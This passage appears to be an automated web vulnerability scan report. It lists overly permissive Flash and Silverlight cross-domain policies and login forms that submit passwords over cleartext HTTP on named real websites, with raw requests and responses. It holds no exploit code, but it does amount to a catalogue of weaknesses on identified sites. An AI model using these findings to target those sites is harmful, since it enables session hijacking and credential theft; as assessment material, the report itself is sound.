X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:34:22 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control perm
...[SNIP]...

5.33. http://www.accuweather.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accuweather.com

Response

HTTP/1.0 200 OK
Content-Length: 1403
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 20:00:39 GMT
Accept-Ranges: bytes
ETag: "c28f298dc2a9ca1:a74"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:34:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.accuweather.com" />
<allow-access-from domain="*.accuweatherchannel.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.oddcast.com" />
<allow-access-from domain="*.ucview.com" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="maps.google.com" />
<allow-access-from domain="maps.yahooapis.com"/>
<allow-access-from domain="spm161.brinkster.net" />
<allow-access-from domain="www.dotglu.com" />
<allow-access-from domain="www.johnfrieda.com" />
<allow-access-from domain="www.travelboards.com" />
<allow-access-from domain="www.topix.com"/>
<allow-access-from domain="66.42.146.50" />
<allow-access-from domain="66.42.146.66" />
<allow-access-from domain="68.167.121.226" />
...[SNIP]...

5.34. http://www1.member-hsbc-group.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.member-hsbc-group.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www1.member-hsbc-group.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:7da"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:29:52 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.35. http://xads.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xads.zedo.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:37 GMT
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:02:14 GMT
ETag: "4557e-f7-44d919ea43180"
Accept-Ranges: bytes
Content-Length: 247
Edge-Control: dca=esi
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.36. http://ziggymedia.go2cloud.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziggymedia.go2cloud.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ziggymedia.go2cloud.org

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/xml
Date: Thu, 03 Feb 2011 17:10:14 GMT
ETag: "71c0a3-fb-493aa02783b80"
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 28 Oct 2010 09:31:42 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 251
Connection: Close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-http-request-headers-from domain="*" headers="*"/><allow-access-from domain="*" />
...[SNIP]...

5.37. http://api.bing.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 13:42:57 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-02-03T13%3a42%3a57; expires=Sun, 13-Feb-2011 13:42:57 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=FBE0622867B545E3BC3608E6771E4D62; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1626582&MS=1626582; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=66899BBFDACA49CA8903CE79870122B3; expires=Sat, 02-Feb-2013 13:42:57 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110203; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

5.38. http://clicks.superpages.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://clicks.superpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: clicks.superpages.com

Response

HTTP/1.1 200 OK
Server: Unspecified
ETag: W/"301-1296249771000"
Last-Modified: Fri, 28 Jan 2011 21:22:51 GMT
Content-Type: application/xml
Content-Length: 301
Date: Thu, 03 Feb 2011 16:10:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com"/><allow-access-from domain="*.bettervideo.com"/><allow-access-from domain="*.biemedia.com"/>
...[SNIP]...

5.39. https://imgssl.superpages.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://imgssl.superpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: imgssl.superpages.com

Response

HTTP/1.0 200 OK
Server: Unspecified
Last-Modified: Thu, 29 Nov 2007 21:24:19 GMT
ETag: "87c-d2-efd546c0"
Accept-Ranges: bytes
Content-Length: 210
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:21:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com" /></cross-doma
...[SNIP]...

5.40. http://media.superpages.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.superpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.superpages.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:22:23 GMT
Server: Unspecified
Last-Modified: Tue, 04 Dec 2007 18:46:47 GMT
ETag: "85d-d2-4755a097"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com" /></cross-doma
...[SNIP]...

5.41. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-Cnection: close
Date: Thu, 03 Feb 2011 16:23:48 GMT
Content-Length: 1581
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
...[SNIP]...
<allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="external.ak.fbcdn.net" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
...[SNIP]...

5.42. http://us.rd.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.rd.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.rd.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:34:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.43. http://www.apple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.11 (Unix)
X-N: S
X-Cache-TTL: 600
X-Cached-Time: Wed, 22 Dec 2010 18:51:54 GMT
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=137
Expires: Thu, 03 Feb 2011 16:37:30 GMT
Date: Thu, 03 Feb 2011 16:35:13 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

5.44. http://advertising.microsoft.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 303
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 13:43:24 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="video.msn.com" />
<allow-access-from domain="images.video.msn.com" />
<allow-access-from domain="fp.advertising.microsoft.com" />
<allow-access-from domain="fporigin.advertising.microsoft.com" />
...[SNIP]...

5.45. http://citi.bridgetrack.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 452
Content-Type: text/html
Server:
Date: Thu, 03 Feb 2011 13:43:00 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
...[SNIP]...

6. Silverlight cross-domain policy  previous  next
There are 7 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.br.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.br.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 18:54:04 GMT
Date: Thu, 03 Feb 2011 13:42:58 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.3. http://dev.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT
Accept-Ranges: bytes
ETag: "a92e8be3f49acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:06:48 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

6.4. http://omnituretrack.local.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituretrack.local.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omnituretrack.local.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:06 GMT
Server: Omniture DC/2.0.0
xserver: www375
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.5. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 02 Feb 2011 17:43:30 GMT
Expires: Wed, 02 Feb 2011 17:43:26 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 81632
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.6. http://api.bing.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 348
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 13:42:57 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-02-03T13%3a42%3a57; expires=Sun, 13-Feb-2011 13:42:57 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=91EAB46F84594F0BBDFDA6EF008A1930; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1626582&MS=1626582; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=1B1BC0ECE78B4BFB99962A5130D7F53B; expires=Sat, 02-Feb-2013 13:42:57 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110203; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*.bing.com"/>
</allow-from>

...[SNIP]...

6.7. http://www.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279716841700000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 17:00:16 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

7. Cleartext submission of password  previous  next
There are 39 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:39 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=ba6gnf15v1.app325a; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=493
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31844

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<div align="right" style="margin-right:1px;padding-top:5px;"><FORM id="LogonForm" name="LogonForm" action="UserLogin?NEXTURL=TRC%3Fpg%3Dcenter%26fr_id%3D26972" method="post" style="margin:0px;padding:0px;">
<table border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
<div class="fieldHolder2" style="padding:0;margin:0;"><input class="textInput2" size="10" name="Password" id="Password" value="password" maxlength="20" type="password" onFocus="this.value=''" /></div>
...[SNIP]...

7.2. http://forums.accuweather.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.accuweather.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: forums.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:05:45 GMT
Server: Microsoft-IIS/6.0
Hostname: photo-02
X-Powered-By: PHP/5.2.16
Set-Cookie: session_id=140970ab83b6322d8ecbd3389e56dd24; path=/; httponly
Content-type: text/html
Content-Length: 140999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">
       
           <form action="http://forums.accuweather.com/index.php?s=140970ab83b6322d8ecbd3389e56dd24&amp;act=Login&amp;CODE=01&amp;CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="focus_username(this)" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="focus_password(this)" value="------" />
               <input class="button" type="image" src="style_images/1/login-button.gif" />
